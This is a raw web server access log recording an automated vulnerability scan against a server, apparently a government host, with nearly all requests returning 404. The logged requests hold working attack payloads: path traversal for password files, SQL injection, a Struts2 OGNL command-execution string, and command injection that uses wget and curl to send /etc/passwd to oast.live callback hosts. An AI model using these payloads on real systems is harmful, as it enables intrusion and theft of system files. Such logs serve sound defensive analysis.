8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 18:39:38 103.153.214.94 GET /downloader.php file=../../../../../../../../../../../../../etc/passwd%00.jpg 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 76 2024-12-12 18:40:12 103.153.214.94 GET /login next=/ 8172 - 156.251.25.152 Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9.2.6)+Gecko/20100628+Ubuntu/10.04+(lucid)+Firefox/3.6.6 - 404 7 0 203 2024-12-12 18:40:13 103.153.214.94 GET /tool/log/c.php strip_slashes=printf&host=nl+c.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_2_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 38 2024-12-12 18:40:15 103.153.214.94 GET /setup/license - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 37 2024-12-12 18:40:16 103.153.214.94 GET /index.php option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/618.3.5+(KHTML,+like+Gecko)+Version/17.4+Safari/618.3.5 - 404 7 0 30 2024-12-12 18:40:19 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 206 2024-12-12 18:40:24 103.153.214.94 GET /wp-content/themes/churchope/lib/downloadlink.php file=../../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 404 7 0 58 2024-12-12 18:40:59 103.153.214.94 GET /index.php option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 18:41:14 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 196 2024-12-12 18:41:21 103.153.214.94 GET /verify.php id=1&confirm_hash 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 37 2024-12-12 18:41:26 103.153.214.94 POST /API/convertCSVtoParquet.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 236 2024-12-12 18:41:27 103.153.214.94 GET /mantis/verify.php id=1&confirm_hash 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 69 2024-12-12 18:41:30 103.153.214.94 GET /mantisBT/verify.php id=1&confirm_hash 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.23 - 404 7 0 61 2024-12-12 18:41:35 103.153.214.94 GET /mantisbt-2.3.0/verify.php id=1&confirm_hash 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 35 2024-12-12 18:41:37 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 56 2024-12-12 18:41:38 103.153.214.94 GET /bugs/verify.php confirm_hash&id=1 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 18:42:14 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 18:42:27 103.153.214.94 GET /collibra.properties - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 18:42:31 103.153.214.94 GET /app/collibra.properties - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.23 - 404 7 0 91 2024-12-12 18:42:34 103.153.214.94 POST /tracking/client_1/get-resource - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.19 - 404 7 0 206 2024-12-12 18:42:35 103.153.214.94 POST /tracking/client_1/read-instruction - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 206 2024-12-12 18:42:36 103.153.214.94 GET /src/collibra.properties - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 18:44:45 103.153.214.94 POST /apps/zxtm/wizard.fcgi error=1§ion=Access+Management%3ALocalUsers 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.17 - 404 7 0 221 2024-12-12 18:44:57 103.153.214.94 GET /index.php/wp-json/wp/v2/sensei_email/ - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 202 2024-12-12 18:45:08 103.153.214.94 GET /graph - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 - 404 7 0 73 2024-12-12 18:45:12 103.153.214.94 POST /login.html - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 18:45:12 103.153.214.94 GET /classic/graph - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.18 - 404 7 0 41 2024-12-12 18:45:13 103.153.214.94 POST /login.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 18:45:13 103.153.214.94 POST /index.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 221 2024-12-12 18:45:38 103.153.214.94 POST /ucmdb-ui/cms/loginRequest.do; - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.0+Safari/537.36 - 404 7 0 205 2024-12-12 18:45:39 103.153.214.94 POST /login.html - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:103.0)+Gecko/20100101+Firefox/103.0 - 404 7 0 199 2024-12-12 18:45:42 103.153.214.94 POST / name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.4.15 - 404 7 0 31 2024-12-12 18:46:16 103.153.214.94 GET /author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 36 2024-12-12 18:46:20 103.153.214.94 GET /cms/author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/617.16.12+(KHTML,+like+Gecko)+Version/17.7.92+Safari/617.16.12 - 404 7 0 40 2024-12-12 18:47:13 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/109.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 18:48:04 103.153.214.94 GET /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.45+Safari/537.36 - 404 7 0 207 2024-12-12 18:48:04 103.153.214.94 GET /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.19 - 404 7 0 216 2024-12-12 18:48:33 103.153.214.94 GET /upgrade.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/618.2.7+(KHTML,+like+Gecko)+Version/17.5+Safari/618.2.7 - 404 7 0 42 2024-12-12 18:50:07 103.153.214.94 GET /api/file path=../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 18:50:14 103.153.214.94 GET /webadmin/clientlogin/ srid&action=showdeny&url 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 33 2024-12-12 18:50:16 103.153.214.94 GET /index.php s=example 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 40 2024-12-12 18:50:17 103.153.214.94 GET /vicidial/welcome.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 199 2024-12-12 18:50:17 103.153.214.94 GET /spip.php pag%65=spip_pass&lang=fr 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 18:50:18 103.153.214.94 GET /authenticationserverservlet - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 56 2024-12-12 18:50:18 103.153.214.94 GET /download/C:/windows/system.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.17 - 400 0 0 53 2024-12-12 18:50:46 103.153.214.94 GET /api/getServices name[]=$(wget%20--post-file%20/etc/passwd%20ctcj3jjbclslbev4n7q0qif11johekr6u.oast.live) 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 42 2024-12-12 18:50:46 103.153.214.94 GET /CFIDE/administrator/enter.cfm locale=../../../../../../../lib/password.properties%00en 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 50 2024-12-12 18:50:57 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/617.2.4+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4 - 404 7 0 206 2024-12-12 18:51:21 103.153.214.94 GET /index.php/install - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 39 2024-12-12 18:51:21 103.153.214.94 GET /wp-json/h5vp/v1/video/0 id='+union+all+select+concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5(999999999)),2,3,4,5,6,7,8--+- 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 51 2024-12-12 18:51:23 103.153.214.94 GET /admin/index.php module=file_editor&file=/../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 33 2024-12-12 18:51:25 103.153.214.94 GET /wd/hub - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 18:51:28 103.153.214.94 GET /perfsonar-graphs/cgi-bin/graphData.cgi action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 57 2024-12-12 18:51:31 103.153.214.94 GET /settings.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 54 2024-12-12 18:51:43 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.16 - 404 7 0 32 2024-12-12 18:51:47 103.153.214.94 GET /admin/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 18:53:35 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.0+Safari/605.1.15 - 404 7 0 202 2024-12-12 18:53:56 103.153.214.94 GET /stat.jsp cmd=chcp+437+%7c+dir 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 43 2024-12-12 18:55:08 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 218 2024-12-12 18:55:47 103.153.214.94 POST /api/v1/user/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.6+Safari/605.1.15 - 404 7 0 201 2024-12-12 18:55:47 103.153.214.94 POST /cgi-bin/dispatcher.cgi cmd=1 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 196 2024-12-12 18:55:48 103.153.214.94 GET /system/console/bundles - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 199 2024-12-12 18:55:48 103.153.214.94 POST /cgi-bin/dispatcher.cgi cmd=3 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 18:55:48 103.153.214.94 GET /system/console/bundles - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 226 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 202 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.21 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 199 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 200 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 200 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.23 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 199 2024-12-12 18:56:26 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 18:56:26 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+U;+Linux+i686;+pt-BR;+rv:1.9.0.3)+Gecko/2008092510+Ubuntu/8.04+(hardy)+Firefox/3.0.3 - 404 7 0 199 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 202 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 206 2024-12-12 18:56:26 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 227 2024-12-12 18:56:26 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.9.17 - 404 7 0 235 2024-12-12 18:56:26 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 18:56:26 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.4)+AppleWebKit/616.33+(KHTML,+like+Gecko)+Version/17.6+Safari/616.33 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 240 2024-12-12 18:56:32 103.153.214.94 GET /_next/image w=16&q=10&url=http://ctcj3jjbclslbev4n7q0ddq91xtfofdi5.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.135+Safari/537.36+Edge/12.10240 - 404 7 0 65 2024-12-12 18:56:36 103.153.214.94 GET /_next/image w=16&q=10&url=https://ctcj3jjbclslbev4n7q0gw4yubc1bhopp.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 56 2024-12-12 18:56:43 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_6_6;+de)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.2+Safari/605.1.15 - 404 7 0 233 2024-12-12 18:56:44 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Mobile/15E148+Safari/604.1 - 404 7 0 225 2024-12-12 18:57:50 103.153.214.94 POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 232 2024-12-12 18:58:17 103.153.214.94 GET /db/robomongo.json - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.2.19 - 404 7 0 59 2024-12-12 18:58:20 103.153.214.94 GET /robomongo.json - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 31 2024-12-12 18:59:36 103.153.214.94 GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 201 2024-12-12 19:00:45 103.153.214.94 GET /api/v1/users/admin fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 224 2024-12-12 19:00:54 103.153.214.94 GET /pme/media/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 404 7 0 34 2024-12-12 19:01:15 103.153.214.94 GET /cacti/cmd_realtime.php 1+1&&curl%20ctcj3jjbclslbev4n7q0fbnzymx5wd3db.oast.live+1+1+1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Teak/4.3.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 39 2024-12-12 19:01:17 103.153.214.94 GET /pmb/opac_css/getgif.php chemin=../../../../../../etc/passwd&nomgif=dhvQ 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 19:01:19 103.153.214.94 GET /pacsone/nocache.php path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 37 2024-12-12 19:01:22 103.153.214.94 GET /plugin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Mobile/15E148+Safari/604.1 - 404 7 0 31 2024-12-12 19:01:23 103.153.214.94 GET /action/usermanager.htm - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 54 2024-12-12 19:01:50 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 208 2024-12-12 19:02:27 103.153.214.94 GET /cgi-bin/login_mgr.cgi C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.124+Safari/537.3 - 404 7 0 35 2024-12-12 19:02:29 103.153.214.94 GET / q=./gibbon.sql 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Safari/605.1.15 - 404 7 0 57 2024-12-12 19:02:31 103.153.214.94 GET /report/download.php pdf=../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 19:02:33 103.153.214.94 GET /AccessAnywhere/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 400 0 0 56 2024-12-12 19:02:36 103.153.214.94 GET /CFIDE/wizards/common/utils.cfc method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 40 2024-12-12 19:02:48 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.21 - 404 7 0 53 2024-12-12 